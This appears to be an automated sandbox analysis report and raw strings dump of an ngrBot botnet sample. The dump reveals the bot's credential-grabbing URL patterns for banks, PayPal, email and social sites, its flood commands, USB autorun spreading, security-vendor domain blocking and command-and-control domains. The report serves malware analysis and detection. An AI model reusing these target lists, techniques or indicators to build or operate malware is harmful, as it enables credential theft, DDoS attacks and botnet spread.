DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Exploreriexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
31upjmrlzz.exe
Processes:
PID ParentPID User Path
--------------------------------------------------
768 1176 C:Documents and SettingsMes documents31upjmrlzz.exe
Ports:
Port PID Type Path
--------------------------------------------------
Explorer Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
IE Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
Loaded Drivers:
Driver File Company Name Description
--------------------------------------------------
Monitored RegKeys
Registry Key Value
--------------------------------------------------
Kernel31 Api Log
--------------------------------------------------
***** Installing Hooks *****
719f74df RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)
719f80c4 RegOpenKeyExA (Protocol_Catalog9)
719f777e RegOpenKeyExA (00000095)
719f764d RegOpenKeyExA (Catalog_Entries)
719f7cea RegOpenKeyExA (000000000001)
719f7cea RegOpenKeyExA (000000000002)
719f7cea RegOpenKeyExA (000000000003)
719f7cea RegOpenKeyExA (000000000004)
719f7cea RegOpenKeyExA (000000000005)
719f7cea RegOpenKeyExA (000000000006)
719f7cea RegOpenKeyExA (000000000007)
719f7cea RegOpenKeyExA (000000000008)
719f7cea RegOpenKeyExA (000000000009)
719f7cea RegOpenKeyExA (000000000010)
719f7cea RegOpenKeyExA (000000000011)
719f7cea RegOpenKeyExA (000000000012)
719f7cea RegOpenKeyExA (000000000013)
719f7cea RegOpenKeyExA (000000000014)
719f7cea RegOpenKeyExA (000000000015)
719f7cea RegOpenKeyExA (000000000016)
719f7cea RegOpenKeyExA (000000000017)
719f7cea RegOpenKeyExA (000000000018)
719f7cea RegOpenKeyExA (000000000019)
719f2623 WaitForSingleObject(77c,0)
719f87c6 RegOpenKeyExA (NameSpace_Catalog5)
719f777e RegOpenKeyExA (00000039)
719f835b RegOpenKeyExA (Catalog_Entries)
719f84ef RegOpenKeyExA (000000000001)
719f84ef RegOpenKeyExA (000000000002)
719f84ef RegOpenKeyExA (000000000003)
719f84ef RegOpenKeyExA (000000000004)
719f2623 WaitForSingleObject(774,0)
719e1af2 RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)
719e198e GlobalAlloc()
7c80b72f ExitThread()
7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000
7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000
73371c38 GetCommandLineA()
73372f57 CreateMutex((null))
7d23eab5 WaitForSingleObject(764,7530)
410df8 LoadLibraryA(KERNEL32.DLL)=7c800000
410df8 LoadLibraryA(MSVBVM60.DLL )=73370000
733739f4 GetCommandLineA()
7338d1b3 LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0
7337452c GetVersionExA()
7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000
772370b9 GetVersionExA()
7723711c GetCommandLineA()
7337476c LoadLibraryA(SXS.DLL)=77210000
774efa66 LoadLibraryA(oleaut32.dll)=770e0000
73376792 RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)
77daeff6 RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)
770fc957 LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000
7337a15b LoadLibraryA(kernel32.dll)=7c800000
406f1e LoadLibraryA(kernel32)=7c800000
7337a15b LoadLibraryA(kernel32)=7c800000
7337a15b LoadLibraryA(USER32)=7e390000
7345d09c CreateFileA(C:Documents and SettingsMes documents31upjmrlzz.exe)
7345d34f ReadFile()
406f1e LoadLibraryA(NTDLL)=7c910000
7c8165b3 WaitForSingleObject(74c,64)
7c8191f8 LoadLibraryA(advapi32.dll)=77da0000
7337a4c5 GetCurrentProcessId()=1176
7337bdfa RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)
7337be1c RegOpenKeyExA (HTML Help)
7337be1c RegOpenKeyExA (Help)
7337c9ce WaitForSingleObject(7e4,ffffffff)
73373657 ExitProcess()
***** Injected Process Terminated *****
DirwatchData
--------------------------------------------------
WatchDir Initilized OK
Watching C:DOCUME~1LOCALS~1Temp
Watching C:WINDOWS
Watching C:Program Files
Created: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf
Modifed: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf
Created: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp
Created: C:DOCUME~1zezakLOCALS~1TempJET37.tmp
Deteled: C:DOCUME~1zezakLOCALS~1TempJET37.tmp
Deteled: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp
File: 31upjmrlzz.exe
Size: 116236 Bytes
MD5: 9702091B21C1A48955A5268D07E31EF6
Packer: File not found C:iDEFENSESysAnalyzerpeid.exe
File Properties: CompanyName
FileDescription
FileVersion
InternalName
LegalCopyright
OriginalFilename
ProductName
ProductVersion
Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 312Kb in 0,032 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d
RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
ExeRefs
--------------------------------------------------
File: 31upjmrlzz_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Exploreriexplore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe
Raw Strings:
--------------------------------------------------
File: 31upjmrlzz_dmp.exe_
MD5: 42157d0a769f0335830e4646c6a00338
Size: 319490
Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
WPVS
t1h(
_[^]
QRPWV
RPQWV
QRPSV
txVhD
uaVhD
QRPSV
SVW3
u3h0
u!h(
u3h0
PQRV
RPQW
u:WhD
u#WhD
QRPW
RPQV
RPQV
PQRV
RPQW
RSSh
vG9u
t0WSV
WVRj
WSPQR
vt9u
t0WSV
WVRj
WSPQR
gfff
WVRj
PWQR
u3h0
u!h(
u3h0
>CAL
uGh4
=MSG t
=SDG
>MSG u`
SVW3
SVW3
9:vP
G;9r
@W;F
Wj h
t&j,j
Wjdj
F4VP
SWf9
t-f;
t=hH
_^[]
=pzC
|04+~4
_^[]
SVWP3
QWSVR
=lzC
QPRWS
RPQS
WQRV
_^[]
_^[]
un9F
t2j h
L9_@vI
;_@r
WVPQR
SQRj
STFU
=pzC
A8j@
QWRPV
B0QPV
=4yA
PQRj
PQRj
SVWh
STFU
Vh@P@
L9^8vE
;^8r
=pzC
hpP@
STFU
PL9^(v^
9+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
;^(r
9~0v/
;~0r
9^8v;
:+=pzC
+=pzC
+=pzC
;^8r
9^@v2
:+=pzC
+=pzC
+=pzC
;^@r
tu9]
RVWPQ
uXWV
QVWRP
u$WP
E$_^[
tpVW
uTVW
E$_^[
E$^[
E$_^[
j&hx
t}hP
QVWh
95hVA
QVht
8POST
tWWV
PQWj
RPQVW
RPQVW
WVRPS
u h(
QWRS
SVWh
SVW3
95PWA
;5PWA
95PWA
;5PWA
VWQh4
t"j V
SVWh
=USERt
=PASS
:Uu#Vh
8Pu.
=FEATt
=TYPEt
=PASVu
=STATt
=LISTu
uuhh
ucWVh
RPQh
PQRh
QRPh
QVh:
Rh~f
_[^]
_[^]
F/PQ
~(WR
T0(RW
t=VW
Qh~f
u4SV
W$RP
tmQh
RSSh
t,PVQ
O,@PQ
TSVW3
WWWWh
F4RP
LSVW3
^<^[
V4QR
vJ9^,u
;F8v
N4PQ
F4RP
F@@PR
F,BRP
u-SSV
RSWWj
8httpu1
u$8H
QRVP
RVPQ
QRVP
RVPQ
=|[A
Qh~f
SVWP
=|[A
Rh~f
hh)A
h`)A
=|[A
tlWP
=|[A
tlWP
=|[A
Rh~f
=|[A
=|[A
_^[]
h0^A
hh^A
SVWj
_^Yj
QPPPPh
h(*A
SVWj,
VjP
[@^]
Vj.P
[@^]
QRRj
RRRRf
[_^]
SVWh
h0*A
*t2:
VhH*A
Qh4*A
QSV3
j PhxWA
h`*A
Vj#S
_^[]
Wj*P
^[_]
h0+A
h$+A
SVWh
VVVV
WWVS
SVW3
RVh-
@PVj
PVh-
VhH+A
SVW3
@PVj
RVj"W
hT+A
hT+A
h|+A
ht+A
Rhh+A
QhX+A
@PVR
Wj j+V
<%u2
VVVV
SVWh
QRPu
PQRu
h ,A
QRhL]A
PhTA
Ph$]A
9Q@w
RRhh
h`]A
h`]A
h`]A
h`]A
Ph0]A
8nu8h
Rh0]A
Qh0]A
Rh0]A
Ph@]A
8nu8h
Rh@]A
Qh@]A
Rh@]A
htXA
h@XA
PVRQhT`A
PQRVh
RQPhT`A
PQRSh
8_^[
hPXA
hXA
hHXA
Rh0]A
Rh0]A
Rh@]A
Qh@]A
h|,A
h|,A
hx,A
QhP_A
Qh|_A
hx,A
h(XA
hp,A
hd,A
h8XA
8httpuM
8:uE
u>8P
PhD,A
$_^[
Qh@`A
_^[
h@,A
h(`A
h|bA
QRPh4,A
h`XA
h4XA
hXXA
hpXA
QRPh4,A
hhXA
RPQh4,A
SVWh
8#t"
RVWP
SVWR
hx,A
hx,A
hx]A
Qhl]A
PQh0]A
u(hl
Ph$]A
QRh0]A
SVW3
h -A
t"h<-A
t"h0-A
u5h(-A
Vh$cA
VhDcA
VhdcA
VhpcA
t)h0u
SVW3
RPhD-A
QRPh
QRPh
PQRhTaA
PQhDbA
PRh(aA
QRPh
SVW3
tRh|,A
uBPh
h`]A
h -A
PWQRh
SPQh
PSRhTaA
PhTaA
PRhDbA
Ph(aA
hx,A
tqCh
s[h5
ht.A
SWhl.A
hd.A
t'j j
h<.A
h46A
SVWh
hx,A
Rh$6A
h/A
h/A
tb@Ph
Rhd/A
;< t
SVW3
Wh00A
h 0A
5$iA
50iA
5<iA
5HiA
5TiA
5`iA
5liA
95$iA
6 iA
taVW
h@0A
hD0A
Ph<_A
|Sj 3
tlSSSSSSSSSShL0A
Phd0A
tU< u
u2Wh
h(3A
hT+A
hT+A
SVWh
hT+A
h,3A
u.h,3A
SVWh
RhP3A
PVQR
h@3A
;SDG
8SDG
h,3A
Qhx3A
RPhl3A
QRhT3A
t!WV
_^[]
hl.A
hd.A
hl.A
hd.A
h(mA
h(5A
t!h85A
_^t)
9|:~
:~+w:~
tK@boL@
L@iBK@
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
.pipe%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
.PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host:
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
SoftwareMicrosoftWindowsCurrentVersionRun
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length:
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability:
From:
Content-Length: %d
X-MMS-IM-Format:
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
send
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
!!!!!!!!
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x
lalorlz1.info
ROCKR
rlz1lola.info
ROCKR
rlz01jm.info
ROCKR
#ROCK
ngrBot
ELPERRO
]1.1.0.0
CUSTOMER
FvLQ49IlzIyLjj6m
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
F4XA
gGWHXA
5hXA
ZpXA
` WA
f0WA
u{A<WA
[@WA
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread inte
rval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
.pipe%08x_ipc
0;0G0O0V0d0n0s0
1)13181Y1e1u1|1
2C2c2
3 363M3j3u3
6(6/686J6O6T6m6
7 7(7O7V7_7
7=8T88
9#9:9W9^9f9~9
98:R:[:
;U<e<j<p<
<g=o=
>*>N>
?%?/?6?A?P?
0<0E0L0S0c0i0t0{0
2!3-4d4n4s4
5(5:5?5D5a5x5
6 6J6a6
7&7.7>7I7N7f7
1#2_2
8"8Q8X8g8q8
9':;:Y:
<'<1<H<X<x<
=%=7=D=K=Z=w=}=
>@>R>>m>
?1?<?B?j?
0g0g1
1"2Q2~2
203N3
424>4^4
8;9~9
:K:';A;_;
<4<><T<^<h<
=*=>=D=N=l=u=
>#>)>8>>>O>Y>^>p>u>
?8?L?c?u?
0$1-1H1N1_1n1
313Y3k3
414l4
515B5P5u5
676V6_6f6v6
889Y9r9
:-:G:
;#;(;2;7;<;A;F;W;
<5<?<^<
<W=l=|=
=d>o>{>
?/?U?`?p?
1P2T2X2
3?4a4h4
5A5H5|5
7U8]8f8}8
9'9-939q9
: :%:n:
;1;J;d;
<%<3<<<B<i<v<
=$=+=0===E=L=T=o=v=
=6>E>
?%?4??
0'0K0�s0x0}0
091M1g1t1
3[3q3
3*494
4-575w5~5
5B6L6
6(7I7]7z7
848_9m9w9
:+:1:7:D:Q:V:e:t:
; ;,;8;L;Q;V;n;s;x;};
;5<B<]<w<
=5===B=N=S=g=l=
5"6-6B6L6Q6c6u6
7 70767=7L7R7
94:{:
'010
1.1F1^1
2(2>2P2b2t2
4K5f5
6=6K6Y6
7*7/7L7S7r7
8]8i8
9+9;9A9G9d9q9w9}9
9/:b:h:
;!;S;`;h;s;
;E<e<w<
=.=<=A=F=L=R=k=u=
>#>,>X>
?-??y?
42484T4`4f4
4X5]5|5
6-646D6Q6[6b6g6q6z6
9 9&9<9G9R9W99q9v9
9::G:M:b:j:z:
;.;6;;;B;H;S;c;k;
<+<F<T<`<
=3=E=Q=
>3>T>k>z>
?Z?r?{?
%0<0V0h0
141>1l1
3g3r3
34c4
5*585R5w5
6!6<6R6a6
7=7C7T7g7z7
8-9L9w9
9-:D:W:
;#;4;:;T;Z;
<#<(<-<2<7<P<j<w<
=)=.=K=[=`=}=
>+>I>V>[>s>z>
?*?H?T?a?g?u?
0,0J0Z0g0l0v0
1%101=1C1I1W1s1y1
2'212<2J2_2
3"3@3P3V3
4)4J4h4x4
535Q5s5
6!6.656D6S6`6m6z6
7?7E7
7'8,818[8w8
8.9K9V9s9
:':,:D:T:Y:r:
;2;7;W;r;w;|;
<$<5<<<F<N<b<
=(=I=O=Z=r=|=
>V>g>|>
>#?h?
0-070D0x0
0@1G1
132D2Z2p2
3*343=3R3^3
3-434=4F5P5]5
536N6[6
637B7U7d7q7
818>8T8]8|8
9T9`9o9u9z9
:!:,:3:;:A:O:Y:f:l:r:
;(;3;9;?;Q;];c;i;{;
<&<3<8<G<T<Z<`<n<
<,=3=A=G=W=w=|=
>@>E>>
>W?`?
010C0H0M0a0f0k0
1 1$1<1M1U1
1-2O2z2
3I3Z3o3z3
4"4'4<4U4_4t4z4
575=5r5|5
6(6=6P6m6z6
7 767<7~7
8A8F8Y8c8j8
999C9
:%:,:3:=:F:e:
;+;=;D;X;];c;i;n;
;.<4<;<@<e<p<w<
="=*=0=;=F=O=Z=b=g=v={=
=7>N>W>]>
>&?7?~?
40;0A0Q0a0
2)2A2[2
2T3]3f5
6F6Y6t6
7I7Y7_7e7k7q7w7}7
8*808;8~8
9 9O9X9^9
9$:0:Q:
:&;2;8;F;
<"<2<=<Q<W<i<
=$=*=4=:=E=K=S=e=
>;>I>
?!?F?M?W?
1$1<1I1[1g1
2%2>2V2a2t2|2
373E3M3a3l3
3@4N4U4
5/565<5R5k5
666i6
7.7M7
8,818M8[8`8
8?9R9
:#:4:9:?:E:P:{:
;#;B;U;[;b;r;
<!<o<
=$=;=C=N=S=X=i=n=s=}=
>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|>
?B?H?N?T?Z?`?f?l?r?x?~?
4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6
7D7L7X77`7d7h7l7p7t7
9(949@9L9X9d9p9|9
:$:0:<:H:T:`:l:x:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h;
